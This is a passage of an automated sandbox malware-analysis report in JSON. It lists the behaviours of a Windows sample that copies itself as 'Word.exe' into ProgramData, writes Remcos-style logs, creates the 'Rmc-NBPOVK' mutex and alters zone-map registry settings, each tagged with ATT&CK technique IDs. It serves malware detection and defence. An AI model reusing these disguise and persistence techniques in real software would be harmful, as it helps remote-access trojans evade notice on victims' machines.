\"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"Word.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"Word.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has an executable section named \".text\"\n \"Word.exe.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has an writable section named \".data\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has an writable section named \".tls\"\n \"Word.exe.bin\" has an writable section named \".data\"\n \"Word.exe.bin\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"Word.exe.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"CopyFileW\" to copy C:\\8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe to new location %ALLUSERSPROFILE%\\Program\\Word.exe (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74840000\n \"Word.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74840000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-NBPOVK\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Rmc-NBPOVK\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Word.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"Word.exe.bin\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" was detected as \"VC8 -> Microsoft Corporation\"\n \"Word.exe.bin\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\version.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe.Local\\\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe.Local\\\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\ProgramData\\Program\\Word.exe:Zone.Identifier\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\8FF2524DA2305109EDA10901710C6DB55E5228A2AA43E7318A958810ED569333.EXE.LOCAL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\ProgramData\\Program\\Word.exe:ZONE.IDENTIFIER\"\n \"Word.exe\" trying to access non-existent file \"C:\\ProgramData\\Program\\Word.exe.Local\\\"\n \"Word.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" writes file \"c:\\programdata\\program\\word.exe\"\n \"Word.exe\" writes file \"c:\\programdata\\remcos\\logs.dat\"\n \"Word.exe\" writes file \"%allusersprofile%\\remcos\\logs.dat\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" writes file \"%allusersprofile%\\program\\word.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"8FF2524DA2305109EDA10901710C6DB55E5228A2AA43E7318A958810ED569333\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Word.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"logs.dat\" has type \"data\"- Location: [%ALLUSERSPROFILE%\\remcos\\logs.dat]- [targetUID: 00000000-00005548]\n \"Word.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Program\\Word.exe]- [targetUID: 00000000-00004116]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"Word.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" reads file \"c:\\8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" reads file \"c:\\programdata\\program\\word.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"Word.exe\" writes a file \"C:\\ProgramData\\remcos\\logs.dat\"\n \"Word.exe\" writes a file \"%ALLUSERSPROFILE%\\remcos\\logs.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"IsWow64Process\" with parameter \"4116\" - (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 